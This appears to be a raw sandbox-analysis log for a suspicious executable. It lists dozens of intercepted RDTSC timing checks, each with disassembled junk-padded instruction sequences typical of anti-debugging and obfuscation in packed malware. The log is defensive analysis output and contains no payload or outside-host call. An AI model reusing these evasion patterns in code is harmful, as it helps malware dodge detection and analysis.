Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB5C4A second address: FB5C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F8E8511F5D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB5DE5 second address: FB5E00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007F8E84B4EF76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB4B70 second address: FB4B75 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F2ACDE second address: F2ACE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB946B second address: FB9489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5E4h 0x00000009 jl 00007F8E8511F5D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB9489 second address: FB949A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F8E84B4EF76h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FBB98F second address: FBB995 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FBE060 second address: FBE064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC27CE second address: FC27D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8E8511F5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC2A99 second address: FC2ACD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF83h 0x00000007 jmp 00007F8E84B4EF85h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC2ACD second address: FC2AD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC2AD5 second address: FC2AD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC2AD9 second address: FC2AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E8511F5E0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007F8E8511F5D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC2D8C second address: FC2D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC2D92 second address: FC2D9C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8E8511F5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F74FFE second address: F75003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F75003 second address: F75056 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b or edi, dword ptr [ebp+122D37B1h] 0x00000011 mov ebx, dword ptr [ebp+1248204Eh] 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F8E8511F5D8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 jng 00007F8E8511F5DBh 0x00000037 adc di, F1D2h 0x0000003c mov dword ptr [ebp+122D255Eh], edx 0x00000042 add eax, ebx 0x00000044 cmc 0x00000045 push eax 0x00000046 push ecx 0x00000047 push eax 0x00000048 push edx 0x00000049 push edi 0x0000004a pop edi 0x0000004b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F75056 second address: F750B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F8E84B4EF78h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000004h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F8E84B4EF78h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 jbe 00007F8E84B4EF7Ch 0x00000046 mov ecx, dword ptr [ebp+122D3865h] 0x0000004c push eax 0x0000004d pushad 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC2EE8 second address: FC2F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8E8511F5DFh 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC2F06 second address: FC2F0C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC2F0C second address: FC2F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC3073 second address: FC307C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC307C second address: FC3088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC3088 second address: FC3096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8E84B4EF76h 0x0000000a pop ecx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC3096 second address: FC30AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 popad 0x00000008 pushad 0x00000009 jns 00007F8E8511F5D8h 0x0000000f push ecx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC30AC second address: FC30C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 jne 00007F8E84B4EF76h 0x0000000e pop edx 0x0000000f jnp 00007F8E84B4EF7Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC87FD second address: FC8801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC8801 second address: FC881D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E84B4EF86h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC881D second address: FC883B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8E8511F5DEh 0x00000008 jng 00007F8E8511F5D6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F8E8511F5D6h 0x00000018 jng 00007F8E8511F5D6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC898F second address: FC8993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC8993 second address: FC8999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC8999 second address: FC899F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC8D88 second address: FC8DA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5E8h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FC8DA6 second address: FC8DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FCC1F8 second address: FCC215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FCC215 second address: FCC223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F8E84B4EF78h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FCC223 second address: FCC22E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F8E8511F5D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FCC369 second address: FCC37E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jl 00007F8E84B4EF76h 0x0000000e jg 00007F8E84B4EF76h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FCC4D7 second address: FCC4EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD3780 second address: FD3786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD3D06 second address: FD3D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8E8511F5DBh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD3D20 second address: FD3D26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD3D26 second address: FD3D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD3D31 second address: FD3D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD3FB6 second address: FD3FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8E8511F5E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD3FD4 second address: FD3FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF81h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD3FEA second address: FD3FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD3FFA second address: FD3FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD3FFE second address: FD4002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD4002 second address: FD400B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD400B second address: FD4027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8E8511F5E5h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD458A second address: FD458E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD458E second address: FD4594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD9E14 second address: FD9E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F8E84B4EF7Fh 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD9E2D second address: FD9E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FD9E45 second address: FD9E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDDF3E second address: FDDF44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDDF44 second address: FDDF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDDF48 second address: FDDF4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDDF4C second address: FDDF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F8E84B4EF76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDDF5A second address: FDDF68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDDF68 second address: FDDF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8E84B4EF86h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDDF86 second address: FDDF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDDF8F second address: FDDF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDDF93 second address: FDDF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDD1D6 second address: FDD1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDD34D second address: FDD351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDD351 second address: FDD357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDD357 second address: FDD35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDD35D second address: FDD39B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F8E84B4EF76h 0x0000000b jmp 00007F8E84B4EF86h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8E84B4EF88h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDD92A second address: FDD93A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F8E8511F5DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDD93A second address: FDD98E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8E84B4EF87h 0x00000008 jmp 00007F8E84B4EF7Bh 0x0000000d jmp 00007F8E84B4EF89h 0x00000012 popad 0x00000013 pushad 0x00000014 jl 00007F8E84B4EF76h 0x0000001a jg 00007F8E84B4EF76h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FDD98E second address: FDD9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 jnp 00007F8E8511F5D6h 0x0000000e popad 0x0000000f push ecx 0x00000010 jmp 00007F8E8511F5E2h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE6654 second address: FE665C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE665C second address: FE666C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE4A3A second address: FE4A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE4A42 second address: FE4A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE4F34 second address: FE4F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F8E84B4EF80h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE531D second address: FE5334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E8511F5E3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE5334 second address: FE533E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E84B4EF76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE533E second address: FE5354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8E8511F5DBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE5354 second address: FE5358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE5358 second address: FE535E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE535E second address: FE5368 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8E84B4EF82h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE5E50 second address: FE5E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FE5E56 second address: FE5E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jp 00007F8E84B4EF7Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FEE3F3 second address: FEE3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FEE3F7 second address: FEE3FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FEE3FB second address: FEE401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFBCE5 second address: FFBCEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFBCEB second address: FFBCF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFBCF3 second address: FFBD12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8E84B4EF76h 0x0000000a jo 00007F8E84B4EF76h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edi 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F8E84B4EF76h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFBD12 second address: FFBD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
